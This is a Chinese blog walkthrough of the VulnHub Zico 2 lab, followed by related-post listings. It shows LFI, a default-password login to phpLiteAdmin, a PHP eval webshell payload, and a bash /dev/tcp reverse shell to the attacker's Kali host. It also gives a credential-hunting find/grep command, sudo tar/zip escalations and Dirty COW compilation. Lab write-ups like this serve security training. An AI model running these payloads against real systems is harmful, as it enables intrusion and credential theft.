Zico 2 靶机 - 详细流程

已于 2024-10-11 21:10:11 修改
阅读量306 收藏 11
点赞数 9
分类专栏: 靶机 - 详细流程 文章标签: web安全 网络安全 安全 网络
于 2024-10-11 21:02:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73983897/article/details/142862740
版权

  • ✨ 准备工作

  1. 靶机 && kali 环境要求

    机器名网络配置
    靶机Zico 2NAT 模式
    攻击机kaliNAT 模式

  2. 靶机下载链接:zico2: 1 ~ VulnHub   

  3. 打开 VMware,将 zico2.ova 拖拽到 VMware

  4. 设置 虚拟机名称(A) - 存储路径(P)- 导入  

  5. 若是,提示出错,点击重试即可

  6. 启动虚拟机,等待安装完成

  7. 启动成功

  8. 右击靶机 - 设置  

  9. 修改网卡(与自己的主机在同一网段下即可,有插网线推荐桥接,WIFI推荐NAT),这里我选择NAT,点击确定

  10. 关闭虚拟机,重复上述操作(8)

  11. 点击  高级,查看MAC地址 - 确定  

  12. 为了防止干扰,这里我将 网络适配器2 的网卡移除

  13. 打开虚拟机

  • ☄️ 信息收集

  1. 确定NAT网段

  2. 可以看到NAT是192.168.49.0/24网段的

  3. kali 执行

    sudo nmap -sn -PR 192.168.49.0/24

  4. 发现靶机IP为:192.168.49.129

  5. 端口扫描:nmap -sV -p- 192.168.49.129      

  6. 发现开启了 22,80 和 111 以及 54476 端口,尝试访问 80 端口,发现如下页面

  • 🌠 获取shell

  1. 在页面下方,发现一个功能点并点击,发现其 URL 具有文件包含漏洞的特征(文件?参数=页面

  2. 第一时间尝试文件包含读取,将 tools.html  替换为  ../../../../../../../../../../etc/passwd  ,确认存在文件包含漏洞。

  3. 继续寻找功能点,发现可见功能点少的可伶,进行目录扫描,找到一个后台登录界面

    dirsearch -u "http://192.168.49.129/"

# 登录界面:
http://192.168.49.129/dbadmin/test_db.php

  4. 发现是 PHPLiteAdmin ,使用默认密码 admin进行登录, 登陆成功!

    # 密码
admin

  5. 版本是1.9.3 ,并且首页包含了其绝对路径,这对我们的漏洞复现会有帮助(复现可以参考一下这篇文章:phpliteadmin <= 1.9.3 远程php代码执行漏洞测试_网络安全|最新Exploit分析的技术博客_51CTO博客

  6. 第一步:创建数据库 test.php   (名字任意,带 .php 就行)

    # 链接
http://192.168.49.129/dbadmin/test_db.php

# Create New Databas
test.php

  7. 第二步:点击我们新创建的数据库,创建数据表 test_table (这里名字和数量任意)

    # 链接
http://192.168.49.129/dbadmin/test_db.php?switchdb=%2Fusr%2Fdatabases%2Ftest_users

# Name
test_table

# Number of Fields
1

  8. 第三步:写入内容(Field任意,Type为 TEXT,Default Value 处填写我们的恶意语句 <注意:恶意语句不能带任何引号>

    # 链接
http://192.168.49.129/dbadmin/test_db.php?action=table_create

# Field
test_content

# Type
TEXT

# Default Value
<?php @eval($_POST[cmd])?>

  9. 第四步:写入成功,根据上面提示的绝对路径和任意文件读取漏洞,使用蚁剑进行连接

  10. 确认权限,是一个Web服务用户

  11. 生成反弹shell的语句,在线链接:反弹shell生成器 (ywhack.com)    ,这里我将其反弹到 kali

    # 监听语句
sudo nc -lvnp 555

# 执行反弹shell的命令
/bin/bash -c '生成的语句'

# 例:
/bin/bash -c '/bin/sh -i >& /dev/tcp/192.168.49.131/555 0>&1'

  12. 反弹成功

  • 💫 权限提升(3)

  1. 通过命令查看,确认该靶机可登录的用户有 rootzico

    grep '/bin/bash$' /etc/passwd

  2. 查找可能包含密码的文件,发现 /home/zico/wordpress/wp-config.php 比较可疑

    find / -type f -readable -exec grep -lE "user|username|passwd|password" {} + 2>/dev/null | xargs -r grep -Hn "zico" 2>/dev/null

# 说明
从根目录开始查找所有可读的文件,筛选出包含特定关键词("user"、"username"、"passwd" 或 "password")的文件
然后在这些文件中查找包含另一个关键词("zico")的行,
最终输出匹配行的文件名和行号,并且在过程中忽略权限错误。

# PS:zico 为可登录的用户名

  3. 查看该文件,发现 zico 用户的账户和密码

    cat /home/zico/wordpress/wp-config.php

# 账号
zico

# 密码
sWfCsfJSPV9H3AmQzw8

  4. 另起终端,使用 ssh 登录

    ssh zico@192.168.49.129

# 密码
sWfCsfJSPV9H3AmQzw8

  5. Sudo 提权(2 )&& 脏牛提权(1)

    提权方式详细说明

    方式一:Sudo 提权(2)

    • 列出当前用户拥有sudo权限的命令

    • sudo -l

      sudo -l

    • 发现拥有sudo权限的是 tarzip ,使用 Linux的辅助提权网站,辅助我们提权 GTFOBins  ;

      tar 提权

      • 输入tar  - 点击 Sudo

        tar

      • 复制并执行这条命令,提权成功

        sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

      zip 提权

      • 输入zip  - 点击 Sudo

        zip
  
  # 临时文件
  TF=$(mktemp -u)
  /tmp/147.zip
  
  # 提权 (将/etc/hosts文件压缩到 /tmp/111.zip 文件中)
  sudo zip $TF /etc/hosts -T -TT 'sh #'
  sudo zip /tmp/147.zip /etc/hosts -T -TT 'sh #'
  
  sudo rm /tmp/147.zip

      • 修改并执行命令,提权成功

        sudo zip /tmp/147.zip /etc/hosts -T -TT 'sh #'

    方式二:脏牛提权

    • 查看靶机的系统版本

      uname -r

    • 发现是3.2.0-23 版本,介于 2.6.22 < x < 3.9  ,尝试进行脏牛提权

    • 在蚁剑的 数据管理 中选中建立的连接,右键 - 选择文件管理, 查看文件

    • 下载链接:Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method) - Linux local Exploit (exploit-db.com)   

    • 若官网不可用,也可以在github任找一个,例:NIMOS/exploit/exploit-db/40839.c at 2c451f84893956f6ef90d689c20062bb073e865d · sominsong/NIMOS (github.com)    ,

    • 将提权文件拖拽到网站目录下(默认路径:/var/www 没有权限,所以我们随便点到 /var/www 目录下的任意文件夹就可以上传了)

    • 切换到当前目录,编译执行,并输入要设置的密码

      # 切换目录(你上传的目录)
cd /var/www/css

# 查看当前目录
ls

# 编译 40839.c ,输出可执行文件 40839 
gcc -pthread 40839.c -o 40839 -lcrypt

# 执行
./40839

# 输入要设置的密码(这里我输入123456)
123456

    • 添加 高权限 firefart 用户 成功

    • PS:这里添加成功后可能会卡住,卡住也没关系,这里我们需要登录之前找到的 zico 用户 来切换用户(当前终端无法切换用户)

      ssh zico@192.168.49.129

# 密码
sWfCsfJSPV9H3AmQzw8

# 切换用户
su firefart

# 输入你设置的密码
123456

# 提权成功

  6. 提权成功,查找flag

    find /root \( -iname "*flag*" -o -exec grep -qi "flag" {} \; \) -print 2>/dev/null

# 说明
从 /root 目录下查找 文件名或文件内容包含 flag 的文件 (一般flag都在root下,你也可以改为 / ,从根目录开始找)

  7. 附Falg位置: /root/flag.txt   ,

    cat /root/flag.txt

  • 🌌 总结

  1. 流程:主机发现 - 信息收集 - Web渗透 -  获取shell - 权限提升
  2. Web渗透

    1. 当发现 文件?参数=页面 类型,甚至是 文件?参数 ,请第一时间尝试文件包含;

    2. 判明框架网站使用某套框架和特殊的软件时,请第一时间搜索 Nday;

    3. 寻找密码的语句可以在获取 shell 后,尝试运行一下,有时会有意想不到的效果;

      find / -type f -readable -exec grep -lE "user|username|passwd|password" {} + 2>/dev/null | xargs -r grep -Hn "zico" 2>/dev/null

    4. 当某个目录拖不进文件时,可以换它的子目录或父目录,因为只是当前目录没有写的权限罢了;

    5. 寻找 Flag 的语句(每次手动翻太麻烦了,这次直接写个查询语句,以后方便用)

      find /root \( -iname "*flag*" -o -exec grep -qi "flag" {} \; \) -print 2>/dev/null
冰水°
关注
专栏目录
zico2靶机渗透测试过程
weixin_46429206的博客
10-20 1489
1、收集ip(netdiscover) netdiscover -i eth0 -r 192.168.116.0/24 -i:选择网卡 -r:选择网段 .1是物理机ip;.2是网关ip;.254是边界ip;.169是目的主机ip 2、收集开放端口(masscan) masscan --rate 10000 --ports 0-65535 192.168.116.169 –rate:发包速率 --ports:选择扫描端口 3、收集开放端口对应的服务 nmap -p 80,22,111,59266 192.
靶机渗透测试实战(六)——Zico2渗透实战
橘子女侠
05-11 7101
目录 一. 实验环境 二. 实验流程 三. 实验步骤 (一)信息收集——主机发现 1. 查看Kali的IP信息;(IP:192.168.37.131) 2. 扫描主机(netdiscover) (二)信息收集——端口扫描 1. 扫描端口(masscan) 2. 详细扫描端口信息(nmap) (三)渗透测试 80端口(http服务) 1. 访问目标靶机的80端口 ...
Zico 2靶机渗透测试
weixin_58786230的博客
08-02 417
【代码】Zico 2靶机渗透测试。
kali渗透综合靶机(五)--zico2靶机
W小哥
03-10 1443
一、靶机下载 下载链接:https://download.vulnhub.com/zico/zico2.ova 二、node1靶机搭建 将下载好的靶机环境,用VMware导入即可使用,文件->打开 导入到合适位置即可,默认是C盘,成功导入虚拟机之后,打开即可 三、攻击过程 kali IP:192.168.27.128 靶机IP:192.168.27.132 1、主机发现 nmap ...
VULNHUB靶机渗透——ZICO2:1
aarong的博客
12-15 1118
本渗透测试中使用的工具有Arp-scan(获取IP)、Nmap(获取目标开放端口和服务信息)、Dirb(网站目录爆破工具)、Zap(漏洞扫描工具)、在线密文破解工具等等。 \1) arp-scan扫描 NAT模式下,arp-scan扫描出靶机的IP:192.168.65.134 \2) Nmap扫描 获取开放端口及服务的全部信息 浏览器打开开启的网站 界面如下,是一个网络购物平台的网站。 \3) Dirb爆破 命令:dirb http://192.168.65.134 爆破结果发现类似于数
VulnHub渗透测试实战靶场 - ZICO2: 1
LYJ20010728的博客
08-07 783
VulnHub渗透测试实战靶场 - ZICO2: 1环境下载ZICO2: 1靶机搭建渗透测试信息搜集漏洞挖掘getshell提权补充 环境下载 戳此进行环境下载 ZICO2: 1靶机搭建 具体步骤参考VirtualBox(Host only)和VMware共用同一虚拟网卡 将下载好的靶机环境,导入VritualBox,设置为Host-Only模式 将VMware中桥接模式网卡设置为VritualBox的Host-only 渗透测试 信息搜集 先用arp-scan扫描一下网段内目标靶机的IP地址
靶机渗透测试(zico2: 1)
@小张小张的博客
11-12 781
靶机渗透测试(): Vulnhub靶机 h 靶机:修改靶机网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(====) 目标:Close your eyes and feel the heat of being in the middle of the Chakravyuh. The Epic Battle formation that is said to uncrackable. Can you crack the Uncrackable? Does it
Vulnhub靶场渗透-zico2
paidx0
10-01 1290
前言 靶机ip(192.168.110.128) 攻击机ip(192.168.110.127) 网络NAT模式 这段时间一直在忙别的事,有两个礼拜没有学习了,哈哈哈 信息收集 打开网站每个页面都简单看了看,发现一个很明显的LFI,先记录下来肯定能用上 继续看就没有什么东西了,网页功能也比较简单,现在再来扫一下目录 很明显是数据库,手试了一波弱口令给我进去了,就是admin 漏洞挖掘 简单说一下 phpliteadmin 其实就是一个类似于 phpmyadmin的一个数据库管理工具 注意他的版本,
Zico2 渗透测试
Darklord.W
04-11 648
Zico2 渗透测试 0x00实验环境 靶机zico2,IP地址:192.168.8.202 测试机:Kali,IP地址:192.168.8.145; 0x01实验流程 信息收集——主机发现、端口扫描 渗透测试 0x02实验步骤 netdiscover主机发现 Masscan以及nmap扫描 首先进行masscan扫描 接下来nmap扫描 对服务漏洞进行搜索 ...
ZICO2: 1【附代码】(权限提升)
weixin_52487093的博客
08-04 701
ZICO2: 1【附代码】(权限提升)
靶机综合渗透环境(zico2手册).pdf
04-07
靶机综合渗透环境——zico2渗透实战
渗透测试实战5——zico2靶机入侵
浅浅的博客
04-25 1466
一、实验环境 攻击机(Kali):192.168.247.156 靶机(Node):192.168.247.154 二、实验步骤 (一)主动信息收集 1、主机发现 2、端口扫描 目标靶机开放22、80、111、50309端口 3、服务版本信息 (二)端口探测 80端口 1、目录探测 分别使用默认字典和大字典对靶机进行目录探测,探测结果如下: 2、访问...
zico2靶机练习
SYJ_361的博客
03-27 2979
本文是对zico2靶机的练习,通过kali和御剑等工具对靶机进行信息收集,利用phpLiteAdmin漏洞,并利用文件包含漏洞上传文件,用蚁剑连接,并通过kali进行反弹shell,最后用ssh登录,对靶机进行提权,并找到flag文件
2024年三个月网络安全(黑客技术)入门教程
2401_85027336的博客
09-25 2189
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
网络安全:数字时代的坚实护盾》
一名资深Java工程师的技术分享
10-10 261
在当今高度数字化的时代,网络安全的重要性如同空气对于生命一般不可或缺。它不仅关乎个人的隐私与财产安全,更对企业的生存发展和国家的稳定繁荣起着至关重要的作用。
个人网络安全的几个重点与防御
nn_84的博客
10-03 454
2 防火墙 大家都用windows 只需在 gpedit.msc 设置 但有什么未知漏洞就不得而知了 因为美国的计划问题。1 浏览器 firefox 这是第一选择 如果你真的不明白可以找找各个浏览器漏洞。3 移动设备带来的危害 比如u盘 等 对于你们认为杀毒可以 那免杀还干吗呢。网络端口溢出漏洞 但防火墙和随机地址的原因 已经可以防御。提权 这是以后遇到的问题 有些漏洞不是随机地址能够阻止。mail 的危险的 来自与代理和漏洞。浏览器溢出漏洞 实时注意更新就可以。
网络安全(黑客)自学
白帽子凯哥聊黑客
10-10 1220
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
网络安全(黑客)——自学2024
最新发布
2401_84466325的博客
10-10 936
网络安全是一种综合性的概念,涵盖了保护计算机系统、网络基础设施和数据免受未经授权的访问、攻击、损害或盗窃的一系列措施和技术。经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
10-10 808
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
设置无标题 android
05-02
在Android应用中,设置无标题是一种简洁和美观的设计方式,可以为用户提供更流畅的使用体验。以下是一些实现设置无标题的方法: 1. 在Android的Manifest文件中,找到对应Activity的标签,并添加”android:theme="@android:style/Theme.NoTitleBar"“属性。这样可以通过Android自带的主题去掉标题栏。 2. 使用自定义的主题,可以在样式表中添加以下代码: <style name="AppTheme" parent="Theme.AppCompat.NoActionBar"> <!-- ...其他样式... --> </style> 这种方式可以通过设置主题去除ActionBar和标题栏,同时保留其他布局元素。 3. 去掉代码中的setTitle()方法,这是一种最简单的方法,通过不设置Activity的标题来实现无标题。 以上就是三种常见的实现Android无标题的方式,开发者可以根据实际需求进行选择。值得注意的是,去除标题栏可能会影响用户的导航体验,因此在设计上需要考虑周全。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值